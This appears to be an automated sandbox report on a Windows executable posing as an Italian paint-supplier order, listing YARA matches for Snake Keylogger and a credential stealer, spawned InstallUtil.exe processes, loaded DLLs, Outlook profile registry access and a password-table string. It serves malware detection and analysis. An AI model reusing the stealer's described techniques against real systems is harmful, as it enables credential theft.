Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003F07000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003F07000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2419737490.0000000006BF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2417061146.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000000.2126445177.0000000000AC2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameTweusday-x64.exe@ vs Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2401541375.0000000002E94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2400292017.0000000000FCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003E71000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003E71000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Binary or memory string: OriginalFilenameTweusday-x64.exe@ vs Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe

Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 3.2.InstallUtil.exe.5b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.InstallUtil.exe.5b0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.InstallUtil.exe.5b0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.InstallUtil.exe.5b0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f07750.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f07750.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f07750.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f07750.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2415481714.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2415481714.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000003.00000002.4586413691.00000000005B2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.4586413691.00000000005B2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2415481714.0000000003F07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2415481714.0000000003F07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe PID: 6332, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe PID: 6332, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: InstallUtil.exe PID: 2676, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: InstallUtil.exe PID: 2676, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/0@3/4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Mutant created: NULL

Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: InstallUtil.exe, 00000003.00000002.4593612118.000000000368A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.000000000286E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002829000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002839000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002847000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.000000000287B000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Virustotal: Detection: 51%
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	ReversingLabs: Detection: 63%

Source: unknown	Process created: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe "C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe"
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003F07000.00000004.00000800.00020000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2417061146.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003E71000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003F07000.00000004.00000800.00020000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2417061146.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003E71000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2419737490.0000000006BF0000.00000004.08000000.00040000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003E71000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2419737490.0000000006BF0000.00000004.08000000.00040000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003E71000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.5dd0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.5dd0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2417201892.0000000005DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2401541375.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe PID: 6332, type: MEMORYSTR

Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_05CB170F push ss; retf	0_2_05CB1722
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_05CB16D8 push ss; retf	0_2_05CB16DA
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_05CB6A7F push 3405CB65h; retf	0_2_05CB6A89
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_07578BEE push FFFFFFA8h; ret	0_2_07578BF4
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_075779ED push FFFFFFBAh; ret	0_2_075779F4
